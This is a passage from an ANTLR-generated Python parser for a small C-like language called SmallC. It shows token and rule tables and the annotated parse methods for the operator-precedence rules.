        buf.write("\2\2\u021c\u021d\7\16\2\2\u021d]\3\2\2\2\u021e\u021f\t")
        buf.write("\2\2\2\u021f_\3\2\2\2\u0220\u0221\7\64\2\2\u0221a\3\2")
        buf.write("\2\2\u0222\u0223\7\63\2\2\u0223c\3\2\2\2\u0224\u0225\7")
        buf.write("\66\2\2\u0225e\3\2\2\2\u0226\u0227\7\67\2\2\u0227g\3\2")
        buf.write("\2\2\67ox\u0082\u008d\u009f\u00a1\u00b3\u00b5\u00c3\u00c5")
        buf.write("\u00d4\u00d6\u00ee\u00fa\u0105\u0107\u0110\u0112\u011c")
        buf.write("\u0127\u012c\u0138\u013d\u014c\u0150\u0155\u015a\u015e")
        buf.write("\u0161\u0165\u0169\u0171\u0185\u018e\u0196\u01ad\u01b9")
        buf.write("\u01c0\u01c5\u01ce\u01d3\u01d5\u01dd\u01df\u01e8\u01ef")
        buf.write("\u01f3\u01fb\u01fe\u0202\u0206\u020d\u0211")
        return buf.getvalue()
class SmallCParser ( Parser ):
grammarFileName = "SmallC.g4"

# The ATN is deserialized once when the class body executes and is shared by
# every SmallCParser instance.
atn = ATNDeserializer().deserialize(serializedATN())

decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]

sharedContextCache = PredictionContextCache()

# Display strings for tokens with a fixed literal in the grammar, indexed by
# token type ("<INVALID>" where the token has no literal form).
literalNames = [ "<INVALID>", "'='", "'?'", "':'", "'||'", "'&&'", "'=='",
                 "'!='", "'<='", "'>='", "'+'", "'-'", "'*'", "'/'",
                 "'%'", "'++'", "'--'", "'&'", "'!'", "';'", "'#include'",
                 "'.'", "','", "'('", "')'", "'<'", "'>'", "'{'", "'}'",
                 "'['", "']'", "'\"'", "'char'", "'float'", "'int'",
                 "'void'", "'const'", "'volatile'", "'mutable'", "'if'",
                 "'else'", "'do'", "'while'", "'for'", "'break'", "'continue'",
                 "'return'" ]

# Symbolic token names, indexed by token type; anonymous literal tokens
# (T__0 .. T__20) show up as "<INVALID>".
symbolicNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
                  "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
                  "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
                  "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
                  "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
                  "<INVALID>", "<INVALID>", "COMMA", "LBRA", "RBRA",
                  "LABRA", "RABRA", "LCBRA", "RCBRA", "LSBRA", "RSBRA",
                  "QUOTE", "TYPECHAR", "TYPEFLOAT", "TYPEINT", "TYPEVOID",
                  "CONST", "VOLATILE", "MUTABLE", "IF", "ELSE", "DO",
                  "WHILE", "FOR", "BREAK", "CONTINUE", "RETURN", "COMMENT",
                  "MULTICOMMENT", "INTEGER", "FLOAT", "IDENTIFIER",
                  "CHARACTER", "STRING", "WS" ]

# Grammar rule indexes, parallel to ruleNames below.  oplevel15..oplevel1
# encode the C-style operator-precedence ladder (15 = lowest precedence).
RULE_oplevel15 = 0
RULE_oplevel14 = 1
RULE_oplevel13 = 2
RULE_oplevel12 = 3
RULE_oplevel11 = 4
RULE_oplevel10 = 5
RULE_oplevel9 = 6
RULE_oplevel8 = 7
RULE_oplevel7 = 8
RULE_oplevel6 = 9
RULE_oplevel5 = 10
RULE_oplevel4 = 11
RULE_oplevel3 = 12
RULE_oplevel2 = 13
RULE_oplevel1 = 14
RULE_program = 15
RULE_include = 16
RULE_stdInclude = 17
RULE_customInclude = 18
RULE_functionDeclaration = 19
RULE_functionDefinition = 20
RULE_parameters = 21
RULE_parameter = 22
RULE_pointerPart = 23
RULE_arrayPart = 24
RULE_statements = 25
RULE_statement = 26
RULE_expression = 27
RULE_ifCond = 28
RULE_elseCond = 29
RULE_whileCond = 30
RULE_doWhileCond = 31
RULE_forLoop = 32
RULE_variableDeclaration = 33
RULE_declarationSpecifier = 34
RULE_cvQualifier = 35
RULE_declaratorInitializer = 36
RULE_declarator1 = 37
RULE_declarator2 = 38
RULE_initializer = 39
RULE_returnStmt = 40
RULE_arguments = 41
RULE_functionCall = 42
RULE_variable = 43
RULE_identifier = 44
RULE_pointer = 45
RULE_typeDeclaration = 46
RULE_floatLiteral = 47
RULE_integerLiteral = 48
RULE_characterLiteral = 49
RULE_stringLiteral = 50

ruleNames = [ "oplevel15", "oplevel14", "oplevel13", "oplevel12", "oplevel11",
              "oplevel10", "oplevel9", "oplevel8", "oplevel7", "oplevel6",
              "oplevel5", "oplevel4", "oplevel3", "oplevel2", "oplevel1",
              "program", "include", "stdInclude", "customInclude",
              "functionDeclaration", "functionDefinition", "parameters",
              "parameter", "pointerPart", "arrayPart", "statements",
              "statement", "expression", "ifCond", "elseCond", "whileCond",
              "doWhileCond", "forLoop", "variableDeclaration", "declarationSpecifier",
              "cvQualifier", "declaratorInitializer", "declarator1",
              "declarator2", "initializer", "returnStmt", "arguments",
              "functionCall", "variable", "identifier", "pointer",
              "typeDeclaration", "floatLiteral", "integerLiteral",
              "characterLiteral", "stringLiteral" ]

# Token type constants (1-based; see literalNames/symbolicNames above).
EOF = Token.EOF
T__0=1
T__1=2
T__2=3
T__3=4
T__4=5
T__5=6
T__6=7
T__7=8
T__8=9
T__9=10
T__10=11
T__11=12
T__12=13
T__13=14
T__14=15
T__15=16
T__16=17
T__17=18
T__18=19
T__19=20
T__20=21
COMMA=22
LBRA=23
RBRA=24
LABRA=25
RABRA=26
LCBRA=27
RCBRA=28
LSBRA=29
RSBRA=30
QUOTE=31
TYPECHAR=32
TYPEFLOAT=33
TYPEINT=34
TYPEVOID=35
CONST=36
VOLATILE=37
MUTABLE=38
IF=39
ELSE=40
DO=41
WHILE=42
FOR=43
BREAK=44
CONTINUE=45
RETURN=46
COMMENT=47
MULTICOMMENT=48
INTEGER=49
FLOAT=50
IDENTIFIER=51
CHARACTER=52
STRING=53
WS=54
def __init__(self, input:TokenStream):
    """Create a parser over *input*, wiring up the class-shared ATN/DFA state."""
    super().__init__(input)
    # The generated parser requires the matching ANTLR runtime version.
    self.checkVersion("4.5.3")
    self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)
    self._predicates = None
class Oplevel15Context(ParserRuleContext):
    """Parse-tree node for the ``oplevel15`` rule (wraps one ``oplevel14``)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel14(self):
        # Single child: the wrapped oplevel14 subtree.
        return self.getTypedRuleContext(SmallCParser.Oplevel14Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel15

    def enterRule(self, listener:ParseTreeListener):
        handler = getattr(listener, "enterOplevel15", None)
        if handler is not None:
            handler(self)

    def exitRule(self, listener:ParseTreeListener):
        handler = getattr(listener, "exitOplevel15", None)
        if handler is not None:
            handler(self)
def oplevel15(self):
    """Parse an ``oplevel15`` rule: a single ``oplevel14`` expression.

    Returns the populated Oplevel15Context; on a syntax error the exception
    is recorded on the context and reported/recovered via the error handler.
    """
    localctx = SmallCParser.Oplevel15Context(self, self._ctx, self.state)
    self.enterRule(localctx, 0, self.RULE_oplevel15)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 102
        self.oplevel14()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Oplevel14Context(ParserRuleContext):
    """Parse-tree node for ``oplevel14`` (assignment level; right-recursive)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel13(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel13Context, 0)

    def oplevel14(self):
        # Present only for the recursive alternative (lhs '=' rhs).
        return self.getTypedRuleContext(SmallCParser.Oplevel14Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel14

    def enterRule(self, listener:ParseTreeListener):
        handler = getattr(listener, "enterOplevel14", None)
        if handler is not None:
            handler(self)

    def exitRule(self, listener:ParseTreeListener):
        handler = getattr(listener, "exitOplevel14", None)
        if handler is not None:
            handler(self)
def oplevel14(self):
    """Parse ``oplevel14``: either ``oplevel13 '=' oplevel14`` (assignment,
    right-associative via the recursive call) or a plain ``oplevel13``.

    T__0 is the ``'='`` token (see literalNames).  Alternative choice is made
    by the adaptive-prediction engine (decision 0).
    """
    localctx = SmallCParser.Oplevel14Context(self, self._ctx, self.state)
    self.enterRule(localctx, 2, self.RULE_oplevel14)
    try:
        self.state = 109
        self._errHandler.sync(self);
        la_ = self._interp.adaptivePredict(self._input,0,self._ctx)
        if la_ == 1:
            # Alternative 1: oplevel13 '=' oplevel14
            self.enterOuterAlt(localctx, 1)
            self.state = 104
            self.oplevel13()
            self.state = 105
            self.match(SmallCParser.T__0)
            self.state = 106
            self.oplevel14()
            pass

        elif la_ == 2:
            # Alternative 2: plain oplevel13
            self.enterOuterAlt(localctx, 2)
            self.state = 108
            self.oplevel13()
            pass

    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Oplevel13Context(ParserRuleContext):
    """Parse-tree node for ``oplevel13`` (conditional/ternary level)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel12(self, i:int=None):
        # With no index, return every oplevel12 child; otherwise the i-th one.
        if i is None:
            return self.getTypedRuleContexts(SmallCParser.Oplevel12Context)
        return self.getTypedRuleContext(SmallCParser.Oplevel12Context, i)

    def oplevel13(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel13Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel13

    def enterRule(self, listener:ParseTreeListener):
        handler = getattr(listener, "enterOplevel13", None)
        if handler is not None:
            handler(self)

    def exitRule(self, listener:ParseTreeListener):
        handler = getattr(listener, "exitOplevel13", None)
        if handler is not None:
            handler(self)
def oplevel13(self):
    """Parse rule ``oplevel13``.

    Two alternatives, chosen by adaptive prediction (decision 1):
      1. ``oplevel12 T__1 oplevel12 T__2 oplevel13`` — a three-part,
         right-recursive form (shaped like a ternary/conditional; the exact
         operator text of T__1/T__2 is defined in the grammar, not visible here).
      2. ``oplevel12`` alone.
    """
    localctx = SmallCParser.Oplevel13Context(self, self._ctx, self.state)
    self.enterRule(localctx, 4, self.RULE_oplevel13)
    try:
        self.state = 118
        self._errHandler.sync(self);
        la_ = self._interp.adaptivePredict(self._input,1,self._ctx)
        if la_ == 1:
            self.enterOuterAlt(localctx, 1)
            self.state = 111
            self.oplevel12(0)
            self.state = 112
            self.match(SmallCParser.T__1)
            self.state = 113
            self.oplevel12(0)
            self.state = 114
            self.match(SmallCParser.T__2)
            self.state = 115
            self.oplevel13()
            pass
        elif la_ == 2:
            self.enterOuterAlt(localctx, 2)
            self.state = 117
            self.oplevel12(0)
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Oplevel12Context(ParserRuleContext):
    """Parse-tree node for the ``oplevel12`` rule (ANTLR-generated)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel11(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel11Context,0)

    def oplevel12(self):
        # Left-recursive child produced by the precedence-climbing loop.
        return self.getTypedRuleContext(SmallCParser.Oplevel12Context,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel12

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterOplevel12" ):
            listener.enterOplevel12(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitOplevel12" ):
            listener.exitOplevel12(self)
def oplevel12(self, _p:int=0):
    """Parse left-recursive rule ``oplevel12``: an ``oplevel11`` operand
    followed by zero or more ``T__3 oplevel11`` tails (left-associative binary
    operator; exact token text is in the grammar).

    ``_p`` is the minimum operator precedence, checked via ``precpred``.
    Uses ANTLR's recursion-context machinery instead of direct recursion.
    """
    _parentctx = self._ctx
    _parentState = self.state
    localctx = SmallCParser.Oplevel12Context(self, self._ctx, _parentState)
    _prevctx = localctx
    _startState = 6
    self.enterRecursionRule(localctx, 6, self.RULE_oplevel12, _p)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 121
        self.oplevel11(0)
        self._ctx.stop = self._input.LT(-1)
        self.state = 128
        self._errHandler.sync(self)
        _alt = self._interp.adaptivePredict(self._input,2,self._ctx)
        # Loop while decision 2 predicts another operator tail.
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                if self._parseListeners is not None:
                    self.triggerExitRuleEvent()
                _prevctx = localctx
                localctx = SmallCParser.Oplevel12Context(self, _parentctx, _parentState)
                self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel12)
                self.state = 123
                if not self.precpred(self._ctx, 2):
                    from antlr4.error.Errors import FailedPredicateException
                    raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
                self.state = 124
                self.match(SmallCParser.T__3)
                self.state = 125
                self.oplevel11(0)

            self.state = 130
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,2,self._ctx)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.unrollRecursionContexts(_parentctx)
    return localctx
class Oplevel11Context(ParserRuleContext):
    """Parse-tree node for the ``oplevel11`` rule (ANTLR-generated)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel7(self):
        # NOTE: oplevel11 descends directly to oplevel7 (levels 8-10 are
        # separate pass-through rules elsewhere in this file).
        return self.getTypedRuleContext(SmallCParser.Oplevel7Context,0)

    def oplevel11(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel11Context,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel11

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterOplevel11" ):
            listener.enterOplevel11(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitOplevel11" ):
            listener.exitOplevel11(self)
def oplevel11(self, _p:int=0):
    """Parse left-recursive rule ``oplevel11``: an ``oplevel7`` operand
    followed by zero or more ``T__4 oplevel7`` tails (left-associative
    binary operator; token text defined in the grammar).
    """
    _parentctx = self._ctx
    _parentState = self.state
    localctx = SmallCParser.Oplevel11Context(self, self._ctx, _parentState)
    _prevctx = localctx
    _startState = 8
    self.enterRecursionRule(localctx, 8, self.RULE_oplevel11, _p)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 132
        self.oplevel7(0)
        self._ctx.stop = self._input.LT(-1)
        self.state = 139
        self._errHandler.sync(self)
        _alt = self._interp.adaptivePredict(self._input,3,self._ctx)
        # Loop while decision 3 predicts another operator tail.
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                if self._parseListeners is not None:
                    self.triggerExitRuleEvent()
                _prevctx = localctx
                localctx = SmallCParser.Oplevel11Context(self, _parentctx, _parentState)
                self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel11)
                self.state = 134
                if not self.precpred(self._ctx, 2):
                    from antlr4.error.Errors import FailedPredicateException
                    raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
                self.state = 135
                self.match(SmallCParser.T__4)
                self.state = 136
                self.oplevel7(0)

            self.state = 141
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,3,self._ctx)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.unrollRecursionContexts(_parentctx)
    return localctx
class Oplevel10Context(ParserRuleContext):
    """Parse-tree node for the ``oplevel10`` rule (pass-through to oplevel9)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel9(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel9Context,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel10

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterOplevel10" ):
            listener.enterOplevel10(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitOplevel10" ):
            listener.exitOplevel10(self)
def oplevel10(self):
    """Parse rule ``oplevel10`` — a pass-through that just parses one ``oplevel9``."""
    localctx = SmallCParser.Oplevel10Context(self, self._ctx, self.state)
    self.enterRule(localctx, 10, self.RULE_oplevel10)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 142
        self.oplevel9()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Oplevel9Context(ParserRuleContext):
    """Parse-tree node for the ``oplevel9`` rule (pass-through to oplevel8)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel8(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel8Context,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel9

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterOplevel9" ):
            listener.enterOplevel9(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitOplevel9" ):
            listener.exitOplevel9(self)
def oplevel9(self):
    """Parse rule ``oplevel9`` — a pass-through that just parses one ``oplevel8``."""
    localctx = SmallCParser.Oplevel9Context(self, self._ctx, self.state)
    self.enterRule(localctx, 12, self.RULE_oplevel9)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 144
        self.oplevel8()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Oplevel8Context(ParserRuleContext):
    """Parse-tree node for the ``oplevel8`` rule (pass-through to oplevel7)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel7(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel7Context,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel8

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterOplevel8" ):
            listener.enterOplevel8(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitOplevel8" ):
            listener.exitOplevel8(self)
def oplevel8(self):
    """Parse rule ``oplevel8`` — a pass-through that just parses one ``oplevel7``."""
    localctx = SmallCParser.Oplevel8Context(self, self._ctx, self.state)
    self.enterRule(localctx, 14, self.RULE_oplevel8)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 146
        self.oplevel7(0)  # 0 = minimum precedence for the left-recursive rule
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Oplevel7Context(ParserRuleContext):
    """Parse-tree node for the ``oplevel7`` rule (ANTLR-generated)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel6(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel6Context,0)

    def oplevel7(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel7Context,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel7

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterOplevel7" ):
            listener.enterOplevel7(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitOplevel7" ):
            listener.exitOplevel7(self)
def oplevel7(self, _p:int=0):
    """Parse left-recursive rule ``oplevel7``: an ``oplevel6`` operand followed
    by zero or more binary tails, either ``T__5 oplevel6`` (precedence 3) or
    ``T__6 oplevel6`` (precedence 2). Operator token text is in the grammar.
    """
    _parentctx = self._ctx
    _parentState = self.state
    localctx = SmallCParser.Oplevel7Context(self, self._ctx, _parentState)
    _prevctx = localctx
    _startState = 16
    self.enterRecursionRule(localctx, 16, self.RULE_oplevel7, _p)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 149
        self.oplevel6(0)
        self._ctx.stop = self._input.LT(-1)
        self.state = 159
        self._errHandler.sync(self)
        _alt = self._interp.adaptivePredict(self._input,5,self._ctx)
        # Outer loop (decision 5): keep consuming operator tails.
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                if self._parseListeners is not None:
                    self.triggerExitRuleEvent()
                _prevctx = localctx
                self.state = 157
                self._errHandler.sync(self);
                # Inner decision 4: which operator begins this tail.
                la_ = self._interp.adaptivePredict(self._input,4,self._ctx)
                if la_ == 1:
                    localctx = SmallCParser.Oplevel7Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel7)
                    self.state = 151
                    if not self.precpred(self._ctx, 3):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
                    self.state = 152
                    self.match(SmallCParser.T__5)
                    self.state = 153
                    self.oplevel6(0)
                    pass
                elif la_ == 2:
                    localctx = SmallCParser.Oplevel7Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel7)
                    self.state = 154
                    if not self.precpred(self._ctx, 2):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
                    self.state = 155
                    self.match(SmallCParser.T__6)
                    self.state = 156
                    self.oplevel6(0)
                    pass

            self.state = 161
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,5,self._ctx)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.unrollRecursionContexts(_parentctx)
    return localctx
class Oplevel6Context(ParserRuleContext):
    """Parse-tree node for the ``oplevel6`` rule (ANTLR-generated)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel4(self):
        # NOTE: oplevel6 descends directly to oplevel4 (oplevel5 is a
        # separate pass-through rule elsewhere in this file).
        return self.getTypedRuleContext(SmallCParser.Oplevel4Context,0)

    def oplevel6(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel6Context,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel6

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterOplevel6" ):
            listener.enterOplevel6(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitOplevel6" ):
            listener.exitOplevel6(self)
def oplevel6(self, _p:int=0):
    """Parse left-recursive rule ``oplevel6``: an ``oplevel4`` operand followed
    by zero or more binary tails with one of four operators, in descending
    precedence: LABRA (prec 5), T__7 (prec 4), RABRA (prec 3), T__8 (prec 2).

    LABRA/RABRA are named angle-bracket tokens — presumably ``<``/``>``
    comparison operators here; confirm against the .g4 grammar.
    """
    _parentctx = self._ctx
    _parentState = self.state
    localctx = SmallCParser.Oplevel6Context(self, self._ctx, _parentState)
    _prevctx = localctx
    _startState = 18
    self.enterRecursionRule(localctx, 18, self.RULE_oplevel6, _p)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 163
        self.oplevel4(0)
        self._ctx.stop = self._input.LT(-1)
        self.state = 179
        self._errHandler.sync(self)
        _alt = self._interp.adaptivePredict(self._input,7,self._ctx)
        # Outer loop (decision 7): keep consuming operator tails.
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                if self._parseListeners is not None:
                    self.triggerExitRuleEvent()
                _prevctx = localctx
                self.state = 177
                self._errHandler.sync(self);
                # Inner decision 6: which of the four operators begins this tail.
                la_ = self._interp.adaptivePredict(self._input,6,self._ctx)
                if la_ == 1:
                    localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
                    self.state = 165
                    if not self.precpred(self._ctx, 5):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 5)")
                    self.state = 166
                    self.match(SmallCParser.LABRA)
                    self.state = 167
                    self.oplevel4(0)
                    pass
                elif la_ == 2:
                    localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
                    self.state = 168
                    if not self.precpred(self._ctx, 4):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 4)")
                    self.state = 169
                    self.match(SmallCParser.T__7)
                    self.state = 170
                    self.oplevel4(0)
                    pass
                elif la_ == 3:
                    localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
                    self.state = 171
                    if not self.precpred(self._ctx, 3):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
                    self.state = 172
                    self.match(SmallCParser.RABRA)
                    self.state = 173
                    self.oplevel4(0)
                    pass
                elif la_ == 4:
                    localctx = SmallCParser.Oplevel6Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel6)
                    self.state = 174
                    if not self.precpred(self._ctx, 2):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 2)")
                    self.state = 175
                    self.match(SmallCParser.T__8)
                    self.state = 176
                    self.oplevel4(0)
                    pass

            self.state = 181
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,7,self._ctx)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.unrollRecursionContexts(_parentctx)
    return localctx
class Oplevel5Context(ParserRuleContext):
    """Parse-tree node for the ``oplevel5`` rule (pass-through to oplevel4)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel4(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel4Context,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel5

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterOplevel5" ):
            listener.enterOplevel5(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitOplevel5" ):
            listener.exitOplevel5(self)
def oplevel5(self):
    """Parse rule ``oplevel5`` — a pass-through that just parses one ``oplevel4``."""
    localctx = SmallCParser.Oplevel5Context(self, self._ctx, self.state)
    self.enterRule(localctx, 20, self.RULE_oplevel5)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 182
        self.oplevel4(0)  # 0 = minimum precedence for the left-recursive rule
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class Oplevel4Context(ParserRuleContext):
    """Parse-tree node for the ``oplevel4`` rule (ANTLR-generated)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel3(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel3Context,0)

    def oplevel4(self):
        return self.getTypedRuleContext(SmallCParser.Oplevel4Context,0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel4

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterOplevel4" ):
            listener.enterOplevel4(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitOplevel4" ):
            listener.exitOplevel4(self)
def oplevel4(self, _p:int=0):
    """Parse left-recursive rule ``oplevel4``: an ``oplevel3`` operand followed
    by zero or more binary tails, either ``T__9 oplevel3`` (precedence 3) or
    ``T__10 oplevel3`` (precedence 2). Operator token text is in the grammar.
    """
    _parentctx = self._ctx
    _parentState = self.state
    localctx = SmallCParser.Oplevel4Context(self, self._ctx, _parentState)
    _prevctx = localctx
    _startState = 22
    self.enterRecursionRule(localctx, 22, self.RULE_oplevel4, _p)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 185
        self.oplevel3(0)
        self._ctx.stop = self._input.LT(-1)
        self.state = 195
        self._errHandler.sync(self)
        _alt = self._interp.adaptivePredict(self._input,9,self._ctx)
        # Outer loop (decision 9): keep consuming operator tails.
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                if self._parseListeners is not None:
                    self.triggerExitRuleEvent()
                _prevctx = localctx
                self.state = 193
                self._errHandler.sync(self);
                # Inner decision 8: which operator begins this tail.
                la_ = self._interp.adaptivePredict(self._input,8,self._ctx)
                if la_ == 1:
                    localctx = SmallCParser.Oplevel4Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel4)
                    self.state = 187
                    if not self.precpred(self._ctx, 3):
                        from antlr4.error.Errors import FailedPredicateException
                        raise FailedPredicateException(self, "self.precpred(self._ctx, 3)")
                    self.state = 188
                    self.match(SmallCParser.T__9)
                    self.state = 189
                    self.oplevel3(0)
                    pass
                elif la_ == 2:
                    localctx = SmallCParser.Oplevel4Context(self, _parentctx, _parentState)
                    self.pushNewRecursionContext(localctx, _startState, self.RULE_oplevel4)
                    self.state = 190
                    if not self.precpred(self._ctx, 2):
                        from antlr4.error.Errors import FailedPredicateException
